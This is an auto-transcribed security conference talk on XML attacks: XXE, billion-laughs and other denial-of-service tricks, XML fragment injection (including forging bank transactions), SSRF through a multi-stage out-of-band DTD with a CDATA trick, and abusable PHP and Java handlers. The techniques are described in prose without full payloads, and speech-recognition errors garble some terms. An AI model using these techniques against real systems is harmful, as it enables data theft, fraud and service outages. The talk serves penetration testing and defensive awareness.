
hi everyone my topic today is xml attacks on boring and the lost methods so uh in the most recent years a lot of eczema related problems came to the daylight i think this is partly because the most recent overs top 10 contains xxe and a lot of applications are tested against only this list sadly to include this vulnerability is uh quite great but there is room for improvement in the way we do it i think in the following few minutes i try to share some information to achieve this goal i mean the improvement uh the methods and techniques shared here are not the result of my greatness but the forgotten or not well utilized past discoveries this is because as i
started to dive deep in the topic a while ago i realized that most of the areas i was facing were basically already documented and those were sadly rarely used so i hope that this will uh improve on that uh we will see that testing is way more interesting than just getting the slash dc slash sw file in case of a successful attack i hope that the majority of us will implement some of these tips in the future so this could be utilized for example in a bug bounty program or something like that as some introduction is always mandatory uh i am mark moodley and i love to teach and make systems better but i do not really would like to waste time
on myself uh in case anyone is interested in having a chat with me i'm happy to do so uh but they should wait uh for the end of the talk and my email address will be shared there if they are still not convinced to avoid me uh just a quick shout out uh for the guys at the hungarian podcast called hackish language as one of the main reasons i am sharing this is because they had a great episode uh with otila morochi uh i guess uh in which they gave me the motivation to do this but do not blame them uh if my uh performance is not top notch or or the topic is evident for everyone and by the
way at the end i will reveal what the underlying reason is for yoda's unusual speech patterns so i guess this was way more than i wanted to share or say about myself so let's get to the content itself history i know that this isn't a favorite topic of anyone but as the somewhat online nature of the conference prevents me from uh getting some feedback on the age of the audience i think it is better to mention some artifacts from the past that we still carry today i was lucky or unlucky enough depends on the aspect to see the hungarian internet and web grow and evolve into well something and slowly catching up uh with the global leaders or standards
of the uh web i hope and uh from that journey there are some points uh to take with us i think
so let's talk uh about the origins uh in case uh we have not heard about it sgml is a framework which helps us describe markup languages like the hopefully well known html and xml as well in some cases we could still remember the not so good old days when the sites we were visiting were not able to be displayed as intended and there was kind of an anarchy how things were interpreted and implemented in many ways and i think all of this was rooted uh deeply in the markup language itself i mean html with the early versions before 4.0 uh i think uh but we are still using these uh levels or or versions of this
language so we still carry on with these legacies uh not only the user experience was questionable but because of this nature of the html uh more mechanical and architectural and reliability problems arose uh from this ambiguity there was actually a case when a hungarian web developer forum uh labor uh yeah that was way way before a stack overflow uh had a post where the most accepted answer suggested to implement price management based on exchange rate scraped from a big bank's website uh the example provided was basically a regular expression it was working uh just because the html wasn't changed in a while uh everyone seemed to be happy and things were all right i guess uh until one day
as all of the tale uh tales start the bank redesigned uh its web page uh as you can imagine all hell broke loose so some web shops were offering uh items priced with a really customer friendly uh zero hungarian foreign uh the better implemented ones um basically said that no item is purchasable at the moment so uh that was quite a mess uh and the wholesome part of the story is that the bank held out uh the developers so uh the bank put the html structure back for a while uh in order uh to give some time to the developers so they could adapt to an officially supported interface as far as i remember i hope that this little tale uh
highlights the necessity having documents which are well formatted obsoleting regular expressions to get some information from sites and of course uh the structure of the documents needs to be verified or validated against of some kind of description as well so uh those were the i guess the first drivers of creating xml i i think uh it is one of the modern days 7 wonder uh so xml was so well created or is so well created that in the past 25 years or something there was no hard need to redesign it completely i think uh utf-8 is the standard that could become uh could be a competitor for it at least but character encodings and hacking regarding that
is on all uh another topic itself so that would be a great topic maybe i will present it later but back to the topic later as the internet user base was growing and everyone wanted to uh look and feel uh the same in each and every browser uh the worldwide web concert zoom came up uh with a great idea what should we do uh and how to solve this problem so they came up with well we kind of like xml we kind of like html so they came out we came up with xhtml uh what nobody likes basically uh i i never understood why anyone would think that developers will start to write good markup
language based documents and create well good sites when they could continue with the crappy solution of the past because of backwards compatibility uh and that was another point where xml xhtml failed miserably because it provided zero backwards compatibility uh actually xhtml died but our beloved xml previewed uh don't get me wrong i really like to use xml itself but i think we are re using it really wrong so not the tool is bad uh we are just misusing it i think so uh why is xml so interesting in a hacker conference as one of the best if not the best uh constructed markup language in history uh it is used in a lot a lot of
specification and as a standard even the handling is standardized so uh if he could exploit a behavior in one site basically we could exploit uh regardless of what language it is implemented in so i do not need i do not really want to bore anyone uh with further more history although i really like uh how it turned out uh but uh i would like to restrict myself from now on to technical details and solutions so uh let's jump to the most known i guess xml attack the xml external entity attack well previously i mentioned that there was a need or or there was something a driver force that we wanted to validate or documents meaning that we want to ensure that the
structure is is a predefined one for example and this is done mostly in two ways one being the docty definition aka dtd and the other one is being the xml schema definition autoboost could be abused and this talk's focus will be the uh dtd part of it so uh what is the most and well-known attack of eczema so i'd really love to see how many of us is comfortable with dtd by raise of hand but i assumed a quick summary is not against anyone's wheel of course the online nature prevents me to do so so i need to get through this part as well so in the xml document we could create a section or reference document as well
which is used to validate the structure of the markup uh data types uh the structure of the tags are related to itself and so on uh for the document it is also a requirement uh to be uh well formatted so the dtd check could be uh done after uh the document is uh checked for uh being well formatted so we are able to do here a lot of things in here and besides the document model basically we could create also entities and those could be simple text ones and there could be a little extra which is a most of the attitudes are relaying on so behold the external entity uh for for a long time i had no idea why
anyone uh mindful would design something like that but as i was researching this i came across some applications that used uh disk technology to uh store environment specific variables so i think it could be okay but only as an additional feature um yeah so i mentioned the hackish language guys uh they were one reason why i give this talk and the second reason i really wanted to give this talk is that i really like to play ctf and by that i do not exclusively refer to the unreal tournament game mode but also the i.t security competitions as well and sadly i do not have a lot of time to do so so i'm always a bit disappointed
than an xml ex challenge uh is marked hard and the solution is basically uh the same as uh this little example on the screen uh of course uh it is dressed in in different shapes or or addresses every time but it is still kind of a letdown for me when when the changes or the challenge itself is five lines and that's all and i wanted to make another shout out uh to the hungarian party participants um please play ctf games join ctftime.org and play ctf games uh i am the only semi active member of the hardcore iit team which has not participated in a challenge in like three months or something this year so there was like two active months
where we played and we are still placed in uh fifth uh i think uh in the hungarian uh country so shame on us are joined to play and let's do some ctf plays okay so on to the second most known xml based attacks i think yeah and it is denial of service i am sure that most of us heard about uh one really famous uh but let's ex but let's explore uh a little more on this particular topic topic so uh in a denial of service example or a denial of service um attack we could basically aim for three different things uh these are the most valuable uh resources in a computer and that is
memory cpu and network uh sadly most bug bounty programs forbid those attacks but i have seen some progress in the most recent months so i i hope that in the future we will be able to utilize uh some real but forgotten techniques regarding to those so when i said that there is a well-known xml dos attack probably most of the audience uh showed uh about some reason overlook or memory uh overloading or overbooking uh which is not else than uh the billion laugh attack uh the only requirement for this attack is that the internal entity option for the dtd must be enabled it is really uh one of the cheapest solution to uh dos a given service as it requires
basically uh only a few lines of input and its effects are quite remarkable uh one of the given example uh which we could see uh it consumes like three gigabytes of memory and this could be scaled up by either by changing the uh contents of the lower entity and uh the depths as well so uh it is quite an interesting one it is it uses the quadratic blow up uh it consumes a lot of memory uh which could be necessary for the application and reserves a huge amount of processing power uh in order to do so and it is called the billion love uh because uh this little lull or laugh out loud uh part is repeated uh i think 10 to the
power of nine i i do not want to confuse yes 10 to the power of nine as i do not want to confuse uh with the uh long scale billion which is 10 to the power of 12 i guess so yeah the billion laugh attack but let's let's just not hate xml if someone is happy that they are using yamo for configuration files i have some bad news for them as well so the attack is possible uh in some scenarios here as well but sorry uh for the uh of tracking uh get back to uh the memory based uh attacks what if we do not have the luxury that the dtd is enabled in a document
basically uh we've got some tricks in our pocket to get through this situation as well and cause some trouble uh but those could be way more painful for the attacker to employ so basically we need to have more resources dedicated for that attack a lesser known one is for example the mega tags uh here the adversary creates a really really large uh opening and closing tag something in order in the order of megabytes magnitude uh and sends it as an input this could cause quite some surprising failures in a target system ranging from buffer over slow overflows and and simple memory allocation
yeah so that's quite an interesting topic uh we especially use the tags not uh the small data or the data part uh of the uh message as for the data in most of the parsers there are hard limits so basically there shouldn't be x amount of characters there and basically they are limiting it this way but uh in in the parsers are not so mindful handling uh the uh tags and thus we could uh take a look around there and cause some trouble as there uh another a good uh candidate for for an attack like that is um to aim for the object limit of the parser and stop other necessary objects uh to be created
for example some gvm java virtual machines have got a smaller hard limit on how many objects could be created or are located at once by a process and this way as these objects are live they could not be removed by the garbage collector and the gvm crashes or could crash i highly recommend uh to try these tricks uh for the next penetration tests and and tests in our environment uh as i i must admit uh it is a joy to see the surprise on the local security folks face uh when you are able to stop a service with a single xmr file even when the dtd is completely disabled uh we need to really talk about uh the
cpu are targeted exploits or cpu targeted problems a really good candidate for a surprise finding is a deeply nested eczema which could cause excessive cpu psycho usage a couple of thousand nested object or nested tag could lead to severe consequences as it is not easy to utilize uh parallelism on it uh even when a parser is using uh recursion uh we could as well create some memory error as the stack trace could eat up quite a bit of memory as well the next cpu attack is kind of an unusual one uh i really like uh it like it when we can utilize other sites and services in order to achieve something big if a service is running in a pooled
manner with exclusive locks we could starve the other threads starting with remote long distance addresses we are uh able uh to slow down the parser and wait uh for a long time uh so uh we could ensure that it will be quite a long time to parse the xml itself if we would like to push it even further we could use our own slow responder servers basically if anyone heard about the slow loris attack uh we could utilize something like that but not uh with the apache browser but uh the uh xml processing part of an application uh and yeah this could exhaust the server's connection pool limit as well as the thread limit so
yeah we could utilize it with the slow slow loris attack like behavior okay we really need to speak a word about networks most of the parsers are not using i'm header checking so we are able to refer to almost any kind of files to be downloaded as a mime sorry as a dtd document and if we could uh think about it basically an attacker uh could start to don't download uh four or five uh for example ubuntu images uh ubuntu iso images as dtd and that would uh have quite an impact on the application or network performance okay but we really need to get to something that could be utilized during a bug bounty session
so i think uh we should speak about xml fragment injection uh i hope everyone is familiar with the uh injection based attacks like hq sql injection and ldap injection so let's familiarize with some xml based ones these attacks are one of the most underutilized ones i think in an xml environment but as almost all of the injection attacks are related to concatenation to a certain degree this will have this pretty condition as well and uh it is quite good that a lot of developers are using proper cell realization for eczema so these attacks are are more more likely in the trial by error segment so uh in which case uh in a case where we can alter the xml
itself it is an easy task to add text to it uh i had success in some uh application adding the admin node uh in for example a user registration xml message and i became instantly admin on the system uh it is really unusual but sometimes it works a more likely scenario is when some part of the message is concatenated and we could simply add our payload in for example a post field post data field in a registration or update form in the case displayed here uh we need the parser to handle uh duplicated uh tags in in a field so as we can see uh the bio element is duplicated in here so uh that does not really work in most of
the cases but uh there are uh some edge cases where it uh is really useful and fun to exploit um if you take a look at uh this example which is a modified version of uh one exact finding i had in a system uh we all know uh where this is going so the concatenated message is something that is well really good to be exploited in a banking environment so if we craft or specific message to create an additional transaction in the boot processing uh we could basically have a free transfer to our or another uh bank account uh it is really hard to exploit these ones and uh even with internal knowledge it is
not uh easy to pull of this kind of uh uh but before with this kind discard this kind of attack i really would like to point out out that a lot of incidents are happening from actors that has really deep knowledge of the given system or have got some sources leaked and stuff i think uh that it is enough on the injection let's explore the following topic which is server side request forgery but why the xml processing server is most likely to be in an ip zone where a lot of private stuff is available uh international services status reports git likes repositories or something so that's quite a good target to look for we could discover uh internal services
uh with the previous examples we just need to swap uh the file uh uri or url uh to an internal http or https based url later on we're gonna speak a little bit about uh these kind of handlers and specific ones um so it is easy to see that we could uh get informations from uh different sites i uh said git specifically because uh you could explore a git repository uh using get request so that's quite great okay but what happens uh when we are trying to reach something that will not be possible in the pet store swagger io are the swagger.json file contains special characters that are not able to be parsed or they could not be parsed uh
so our xml parser will uh throw an error for us later on we're going to see a demo for that as well so have we ever heard about c data basically it's a block which is excluded from interpreting it is telling the xml parser that the following segment of the document is a character data so do not try to parse it it is quite a good candidate for having this kind of hack to be work but there is a problem with it to that problem uh we've got a solution which is not mentioned so far which was not mentioned so far and uh here is where the clever uh part comes uh in the dtd we
are able to create uh so-called parameter entities and with the help of these we will be able uh to basically uh create the c data block uh and get the content of the site as well without uh having the failure having the parser to fail so it is not an easy one uh it is a multi-stage exploit so we've got quite some things to do so without further ado i would like to share some kind of demo in my lab environment i created a small showcase to demo this whole thing and the most easy xml attack that is employed all the time is basically uh utilizing this service which uh gives us back a simple message
uh from the server uh the attack that we initially showcased or initially told the xxe attack is as follows
so we could get the file content we are using this file handler uh but we really would like to get to this internal uh website of the uh on the other domain uh which is the 106. so we could utilize that service so imagine that this service is not available from us uh and this is a securely zoned computer for computer for example we could get the internal site content then the source of the internal file is valid and well formatted document but what happens when we uh try to get uh the swagger uh json from the pet store example from swagger.io uh the problem here is that we are getting an error where uh the uh document is not able to be
parsed because it is uh containing special characters for example here but we really would like to have these kind of documents as one of the penetration tests i've performed contained a swagger documentation similar to this one but of course on a live and production service and i really wanted to see what api could i call because there are of course get services which should be available and as we can see we clearly can send uh or receive data from these kind of services so we create the example mentioned here which is not really working and we get back because of the c data block uh the xxe and not the content of this uh uri or url that we really would like
to see uh so we create an other uh for example that could be the attacker uh service which have something like that along the lines with that uh we specify what kind of uh data we really need of course uh this technique is uh available to use local files as well containing special characters so we create uh us a malicious uh document type definition file and reference it from our attacker side and uh we reference the all which was defined here we are referencing it and uh with the special characters there should be no problem at all it takes a while to reach out to the swagger that io but as we can see we are able to pull
this document even if it has got some kind of special characters which should prevent xml to fail okay and in the log we could see that the dtd was referenced as well and as i mentioned earlier the ddt is not having the extension of dtd and no mime speaking is a perform so the txt extension is valid in here as well
so getting back to our slides i hope that it is understandable now that basically we can get and by that i mean http get almost any internal sites and contents so i think uh it is quite a useful trick to employ in any environment of course uh there are uh preconditions which is necessary which are necessary to this hack to work so i think it's still worth a try in most of the cases there is one topic which is uh worse to mention and that are the handlers in xml i think these are uh really interesting parts of the xml environment or word as of now i mentioned a lot of times that how uniform xml is and and why it is a great
target to attack as the file http https and ftp is mostly implemented ftp is rarely enabled but the first three is kind of always enabled but there are special handlers where we could shine or really exploit a targeted systems system most of the penetration testers are familiar with the php based handler so php has got a handler uh which is uh also php which is called also php uh with filters and this is a really great stuff to get for example base64 encoded php files and contents from the server i i would like to leave for everyone everyone to digest and the following handler php has which is ssh 2 tunneling i i have no comments on that
so please do not enable that like ever in a php situation i think we all know uh where this is going that could be a lot of problems uh forwarding ports with php uh two external sites uh because of an xml attack uh but a lot of talks are just php bashing i think that there is some trouble elsewhere as well uh for example uh the java jar handler could be abused and we could basically access a contents of a zip file uh on a system so and of course uh here still could be working the uh c data hack that we had before uh binary files are mostly uh undoable but text based are mostly okay
in with this c data hack so i could have a whole talk on on this topic by itself uh i mean the handlers uh but i think it is time uh to close up with something unusual so quite a while ago a good friend of mine told me that the secret of presentations are not to tell jokes constantly and be funny all the time but to achieve that that uh everyone in the end uh has a good laugh so to close up i took uh two of the truest or uh finest xml based software development word truce or or dogma and well let's agree on these two facts well we had one problem and we choose to solve it with xml
now we have two problems so it is definitely true uh try to stay away from xml when possible if no one knows how to use it correctly it is a great tool but please please uh configure it and disable the features that are not necessary for the given use case and the second one uh as i promised i have something for the star wars star wars fan base so uh we had one problem and we choose to solve it using multi-threading now two problems we have and i think uh yoda approves the last statement [Laughter] okay hopefully uh there was at least a little grim on everyone's face because of the jokes i really hope that
we had some new or so provoking information in the past few minutes i believe that we really need to show the word that eczema based services could be exploited in many ways so in case there is any question or criticism i'd love to get those via email feel free to contact me and there's just a closing fun fact please never ever use online formatters to beautify your hacking payloads i was mark moodley and i hope that next year we will meet in real life as well take care and enjoy the conference
well thank you mark for the awesome presentation i think that on the discord channel we have not seen any questions yet but this is the time for the audience to ask so please uh if you have any questions just write it in discord until then mark uh could you please uh summarize uh your presentations in some sentences highlight the most important parts of it yeah of course i'm happy to be here and honestly i was quite thrilled that my talk uh made it to the uh final in here so i am glad that everyone uh was here i hope everyone enjoyed it even the dead jokes as well so the key takeaway is uh from the last
side that i think we really should abuse and use xml in a way uh that it is not well utilized right now and i hope that everyone took away some part of the presentation as well so hopefully in the next ctf we will be having some kind of a better understanding and task to deploy or have even from both of the sides of the city of organizers and the participants as well